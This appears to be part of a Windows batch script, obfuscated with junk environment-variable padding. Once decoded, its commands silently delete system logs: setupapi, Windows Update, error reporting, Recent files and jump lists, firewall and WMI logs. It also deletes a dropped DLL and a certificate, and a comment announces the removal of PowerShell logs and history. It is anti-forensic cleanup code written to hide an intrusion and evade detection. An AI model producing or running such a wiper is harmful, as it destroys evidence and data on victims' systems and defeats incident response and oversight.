d%TeGnlzFEA%e%VHdZM%l%n% %QrOuxF%/%LavbJaOwbQ%s%F% %wVhjF%/%MU%f%jFgwmMXMSv% %RbeRqJe%/%YeFh%q%S% %x%"%r%%WinDir%\%Ok%S%inamKlGp%o%KwcNCYHJg%f%RdbR%t%Zq%w%WoMuVygkQ%a%jeQAt%r%YiGzBkdOgp%e%A%D%DwsgdhkhI%i%MZnpuB%s%TYfDVMTSI%t%UMgJu%r%CY%i%FOC%b%Qf%u%aDyk%t%qraG%i%ujZAAHZvIp%o%MmE%n%i%\%FMnvZBN%D%FfIq%a%YLh%t%CwQeJnJY%a%wG%s%Pqkr%t%bcgfms%o%mCGGtt%r%JNUjUrZxh%e%VAuO%\%pGrP%L%Vzir%o%MAhS%g%nGDRQiQ%s%S%\%VWBp%*%aWcfu%"%mE% %cdSOBsWCQ%>%zjbJXw%n%SEFIPQLvz%u%OnQwAjocB%l%Ecy% %alELayLqUa%2%TjIA%>%JtgsMwF%&%Xly%1%qfGpBQqtV%
d%cQZpxhrQJh%e%jOtq%l%UpnwyCIJMp% %AqN%/%doErLLk%s%CfC% %C%/%U%f%YMZyux% %HrlMeLho%/%o%q%rf% %bDfKqUC%"%NFTDC%%WinDir%\%SCS%P%GMUFM%a%CiqTpJxz%n%wmHyTcDcnZ%t%KxuJwdVL%h%fnkJqHAP%e%if%r%cTmMtokz%\%eoOZ%*%PqM%"%gJ% %aMnmTsUcMh%>%VVkCePtSRy%n%qKEg%u%ApOpLnhb%l%buxPwTe% %Lurloz%2%zgByI%>%Ym%&%WZwJs%1%GipuodMU%
d%JAidyI%e%kmd%l%AzlvmhBgs% %vU%/%EcQVzrUM%s%OivobJAXC% %OtrZEW%/%LlRUJ%f%STM% %opU%/%mqLIpj%q%uFbgyNtenE% %NVob%"%rGA%%WinDir%\%fnPjCYiCE%I%Yfdq%N%O%F%Ofx%\%XUDziwoZw%S%w%e%n%t%cshWbcBw%u%ffXLtqt%p%ljho%a%vKYKuA%p%kTHK%i%rdYNujv%.%QH%l%ZYcJxLvK%o%n%g%XFthR%"%QEhRnvPlt% %V%>%APP%n%Unwj%u%BcoRot%l%qsBLTn% %m%2%acmznOeu%>%CBsHp%&%J%1%zHHxHN%
d%IIpFCFd%e%JZ%l%bVPeqk% %Y%/%BDdeqIsnqM%s%AdEys% %wzer%/%xmZSCea%f%mrbJeOUtvc% %NJaSv%/%GNax%q%IlpTWVB% %Uys%"%GIUGlx%%WinDir%\%k%I%tsFO%N%vrDFPvm%F%HT%\%caTd%S%JJs%e%BQxTFGMFc%t%nTvRYE%u%MDAiCCazKA%p%QStUDgOpq%a%qECTY%p%CUmivHEjKe%i%iqtx%.%lT%d%IhzQHRatP%e%AD%v%z%.%BEYjP%l%exPtqod%o%pJXgzey%g%KwFOlevYHL%"%IvujZqc% %lQCVvA%>%rdbc%n%TIPcu%u%WBOCWMgka%l%DtGRFuqD% %qABRrmGds%2%M%>%yUuZV%&%WCT%1%OepGEL%
d%X%e%TWY%l%y% %KRkc%/%iHB%s%Th% %uNcC%/%YxIeH%f%A% %wBHZNW%/%QiDMrkBt%q%LRcHFbH% %fjtnbGQ%"%ZmWxjYdPVS%%LocalAppData%\%DHQzV%M%BiMJ%i%lJckHlEh%c%tR%r%QKkYwQ%o%b%s%NYxSpDr%o%IizMJ%f%ciJUoWJc%t%H%\%KfW%W%qTQyY%i%yuJ%n%heUxqUKw%d%vbrJBFqLH%o%GptNEKeY%w%DJoQi%s%Xrqp%\%sfF%W%lcHzYVl%E%NLSjfuHZ%R%IRudDpmwEn%\%PD%*%X%"%JOyoBLhRml% %kTHgU%>%TXaC%n%GSSPitbI%u%BJ%l%MrCgP% %ZtUM%2%ffck%>%Ufg%&%LXTVGyx%1%U%
d%TIBXFptjjW%e%rDhvxYWvU%l%CNeB% %Bdmm%/%kA%s%yE% %vW%/%oHoOo%f%JyOQQgpWga% %ciQuGs%/%NeEYfl%q%ujDyvTAwTT% %MKWVdb%"%rXhFzhruP%%ProgramData%\%Q%M%is%i%bMvNRyIYi%c%SaeD%r%UGjoBcvEjx%o%azdvK%s%j%o%iLIffZWcQ%f%qUUWjH%t%EAmr%\%ogeiAbM%W%IZcRp%i%XQHFQAWSr%n%NbLt%d%jY%o%PZm%w%p%s%XjjyHJbXC%\%QlwUOMEf%W%JtITt%E%X%R%BIHnBZ%\%WGowcrEGDA%*%ntbnA%"%W% %TqOR%>%E%n%puib%u%znSScj%l%FHPmCQXW% %s%2%M%>%M%&%pggb%1%JZ%
d%oyiw%e%kKsT%l%iNfWnICTrN% %tXZhgRUFt%/%DT%s%Hfqfuuhgzz% %f%/%SVcIc%f%MSr% %OIPE%/%KvIrJGe%q%L% %HJy%"%uegJ%%AppData%\%pXnKdoh%M%xvByd%i%pJGCqyeqx%c%sLEj%r%CmkKwMF%o%WUiExBHA%s%UYfCld%o%jGFcaKd%f%vYVd%t%lWy%\%ME%W%i%i%rFzpC%n%O%d%WR%o%jBm%w%TXhtsihE%s%FrQx%\%fwcvYA%R%ymBInNQ%e%OV%c%rdmzigQaX%e%ZCGmp%n%USlQ%t%UIKe%\%F%*%Qns%"%FINawqQRT% %VV%>%mMDeqfI%n%mQVW%u%WMabDF%l%sACEuMqYOz% %iKlMjBwu%2%OBBgiz%>%rQh%&%BFdnBKFz%1%hg%
d%uYVyty%e%OwPFxOJjp%l%hJlqcgBGn% %SkATuTpb%/%QYSgd%s%BEBxi% %QzmJiEvN%/%NoYsMYE%f%EiZeEUaxq% %RzRRkcgQKy%/%exoO%q%mzAlJLTJu% %yKUKLDwuv%"%NIKgb%%AppData%\%CG%R%jvsdFG%o%iFHICMZn%a%qCvgkRBft%m%UAaQ%i%OJ%n%XqcT%g%TXDMnoFWP%\%jiIsgJdLL%M%LyFbaS%i%khF%c%b%r%kSoTn%o%BhKl%s%CrJhXZTRaF%o%DkKAHzuVFM%f%azIaSfdJAZ%t%y%\%Fbt%W%uzfcwWUsij%i%WoOjcmFHmY%n%V%d%lV%o%WIy%w%Kqk%s%j%\%AV%R%rVBsiX%e%ikNWYhUCOB%c%JfwjUy%e%AaSNUfTUh%n%VHgj%t%rpFl%\%kabRq%*%wjttpGm%"%ghDwXqP% %Jlro%>%obKdUG%n%hZzvC%u%U%l%Xj% %sbIKuOergY%2%JAtoRQMru%>%H%&%RNl%1%zmi%
d%aHCs%e%QmdvwxPOTQ%l%lxNMPWx% %UybwJN%/%UIjEuuD%s%vkqIH% %AVTcgrJ%/%cXYa%f%MpFeGuqms% %sf%/%lh%q%kdzve% %pJGBrhJSn%"%MLdFrCPxoz%%AppData%\%maJniUgVW%M%PBzQjw%i%GZSzxbhQyA%c%Scrk%r%n%o%TxiAN%s%o%o%D%f%foQdEYcz%t%iICCuNE%\%RKy%W%XPltXyJkT%i%TnI%n%BDlxVDCeRG%d%YCdrjnywE%o%qZxGQBuY%w%TXYkxYnTHe%s%n%\%QtESU%R%lRBryqi%e%tQygydWR%c%vtNlyPWJ%e%KrTvGUjfrt%n%Hcx%t%VPINOg%\%UOFw%A%CQDJ%u%jLvFwYD%t%vqXmRg%o%Fjw%m%cem%a%Du%t%lKeCFna%i%UAP%c%rh%D%v%e%cEhGLRoHp%s%frhVuBn%t%MzezmtdJw%i%DjnLiF%n%PDFWAOW%a%Q%t%mYKEZLk%i%hkLBBnRxm%o%BMbDdO%n%h%s%WfjygzIQr%\%VXVqq%*%WsJdaIMI%"%tkvgveBXFt% %MnFWCJH%>%Uq%n%lF%u%TkXvinrN%l%nljfAfM% %xCYbocozKb%2%BFpyb%>%CEemkOQKU%&%kCcnPu%1%WuEPi%
d%yGcWgA%e%OzwP%l%bOfDetV% %ntthj%/%SIkYvmQwk%s%nKxODdC% %sJZ%/%QWs%f%w% %RHWniZB%/%J%q%hdCVo% %UR%"%CWiM%%AppData%\%vkGxWprN%M%V%i%OwXD%c%OQrestpSgp%r%I%o%ujnHljNkU%s%RikbvbNT%o%PI%f%KovxwmRyn%t%M%\%XsdGCTB%W%oY%i%yQ%n%rPJLk%d%ajLZWYdy%o%dDDCY%w%Tm%s%Y%\%Sy%R%G%e%QYWAfe%c%TdhggxDCe%e%Sw%n%EaTw%t%R%\%QvzqL%C%AhBbl%u%pjv%s%iDUxUbCX%t%YnJlcJ%o%ue%m%dZ%D%c%e%pqPBiWjaD%s%oUk%t%NPq%i%mVxceABFf%n%IHy%a%UAYonEYH%t%xWLwNYGeK%i%JfYknAGSJ%o%fY%n%SB%s%O%\%oEJKDCYWy%*%k%"%KrC% %Nf%>%m%n%aBZFEAfPV%u%gUsei%l%UYoe% %P%2%KLQVCUnls%>%RnkXJmYdF%&%oMdrfuTe%1%pfs%
d%OBRAK%e%UeTpLWQ%l%yj% %oGWBQ%/%KEfImWqv%s%TYVluAyR% %rFpvxwD%/%bhnhBKOPf%f%QlrFYeJw% %Rt%/%OcNU%q%uVAlV% %w%"%jYbunb%%WinDir%\%c%S%W%y%sPbDaJvMD%s%OI%t%iQUAJbvk%e%jtJP%m%h%3%ncb%2%fBDnAP%\%kovpM%L%NwlBzxFh%o%YM%g%eWLc%F%edMAjmSX%i%OFlIxK%l%nJQ%e%oBqhGiL%s%zZwIDXAfB%\%JoNba%F%Iq%i%CShxD%r%b%e%qVmCBmzx%w%S%a%DepjZgOjD%l%VAao%l%jDi%\%wUgJXcMvg%*%DJtwdiR%"%exz% %C%>%Ut%n%PtH%u%xGXK%l%KuBpSm% %lIggD%2%uXQRL%>%mVtkuehs%&%nIMSGgz%1%db%
d%bnyEBBvrz%e%TLog%l%orDmdZs% %i%/%jbaSS%s%FxopwQPq% %YZ%/%uenNVIvr%f%ItvgenS% %IWE%/%OhybdbD%q%osmcoWzv% %RQ%"%w%%WinDir%\%zkgWXdXb%S%XTj%y%BpwbJMY%s%PoIXlWqtLG%t%xKgEHpGA%e%Wurli%m%sBFgu%3%RUFVWCDcK%2%NFbrJsVmqD%\%kAaefy%L%ukVbdzNZyF%o%bael%g%tAlINEE%F%G%i%szmqutGV%l%xIcX%e%pu%s%WVDmkmKW%\%DohBmpYAO%W%no%M%JqGwFyEca%I%yDkOrcNr%\%az%*%LVMWvwr%"%m% %t%>%zeaFueaauh%n%SwR%u%nmpDpu%l%a% %JiijZlccUY%2%fgO%>%Zo%&%OJOUaFNEDd%1%cQCSoQrmHc%
d%KXPRva%e%TIMVxUeBg%l%Lwcyh% %KEPERBsmZ%/%FqaJk%s%KoQljIxZ% %dNZH%/%UZNgXBpd%f%JH% %gPNeffP%/%GhDDod%q%QMtO% %RkamA%"%ccfRCF%%WinDir%\%RhNIo%S%UKqLEfhoT%y%PYu%s%tABckpM%t%nz%e%PDKXk%m%SL%3%NXfZS%2%lvEMAt%\%kBa%L%Wu%o%SXpJJgoUj%g%tsfKUhyk%F%bioIvDZQk%i%TPQSi%l%kZfxP%e%ZCyMHn%s%bmNUTgONJj%\%XoBQu%*%sr%"%UkIpkvYUxT% %wsgnja%>%ngWLDqU%n%QNiWwUu%u%HF%l%hqvJuLLTBC% %EfuSzs%2%rDCHkPIWvU%>%ErvwbHRD%&%XSXXZizdJ%1%zor%
d%zwQayYD%e%pl%l%DiO% %LHDbxJPQmS%/%vQgE%s%KvJ% %XpFtEu%/%IRfEX%f%YDbQW% %uEM%/%BC%q%ot% %v%"%tpOuiiVy%%dll_path%"%bPiFQIQsph% %h%>%yKEICiDQE%n%b%u%wcmYCXWkf%l%wqWgdG% %xxmesYfBoN%2%VUi%>%OTYri%&%UVTfIeQy%1%HG%
d%VGSRd%e%aWHR%l%gxONFYKQFc% %JdeQ%/%QbrsUP%s%YhJ% %E%/%AyOePpSrYQ%f%MXf% %RjIobhphjP%/%jvFdB%q%iby% %OIjaCGVm%"%itWZ%%cert_path%"%zgzN% %JRkIhw%>%xyDDlwBSl%n%yCnm%u%b%l%HQcIhiu% %tUPwSm%2%jAS%>%Wzzhj%&%YqOzq%1%bDlMppC%

:: ================================
:%PXiPftsj%:%SNIKp% %uishOTtW%=%q%=%KXa%=%CnRpPmf%=%lBy%=%PGbkYJ%=%ardg%=%bMH%=%LjVazgoe%=%AoyZKE%=%DWbMsDtJir%=%fwnHKgyR%=%BSMVVMR%=%IqawImpNz%=%gbswzyO%=%WqZATzAdL%=%BtP%=%W%=%GMhPklWu%=%C%=%raX%=%GTQmuPZc%=%oSEmQMcFMS%=%uJblOPcSi%=%tCIymj%=%tJgmQ%=%ObrezmEUiv%=%h%=%lMSRRNZyhd%=%UeFbTMEZ%=%I%=%t%=%naneC%
:: Remove PowerShell Logs + History
:%s%:%sUNDU% %vkFlMAfpWn%R%Kprpx%e%E%m%TXx%o%dVF%v%xO%e%zupohxF% %UmXUNHGQ%P%NidiMfIr%o%XJGzXBsi%w%yGhJqrtKL%e%DGlpOre%r%TuWya%S%rUF%h%KfCdO%e%OnSfK%l%Tjc%l%cXUIoqIPno% %ujazn%L%nlH%o%n%g%bI%s%BZpCBb% %rDrjWu%+%ORoO% %GfUXy%H%jSD%i%maNVPFstRZ%s%SDy%t%cdbKLlh%o%En%r%LkxeAUD%y%nz%
:: ================================
:%odQmKWqwjF%:%PC% %CSpqnurVRX%=%MxlqhLdZGl%=%suUSmP%=%vLyHMA%=%bqdBnTcrk%=%e%=%vMmb%=%LaocJ%=%csSFGyyID%=%usCrIf%=%cMQjSSBxbR%=%kzaM%=%duqIoXn%=%qsJVEGAD%=%khrYo%=%LoZyNoPqE%=%FhVoVVK%=%DEV%=%vUjQCfsLf%=%YYyynB%=%RhZpYwar%=%fTvBlc%=%uzUbVkc%=%OVqMwos%=%EpjzeQ%=%pAjfFVN%=%FRzdEoS%=%vK%=%cYVEwiBs%=%LpjtfiVltu%=%SDsG%=%BsxOSdL%=%RfXuGlVap%
e%Qn%c%WwxeUps%h%t%o%iVxGgV% %KOH%R%llAvE%e%sBGwjVZU%m%ooNfUKr%o%Pra%v%th%i%yvoz%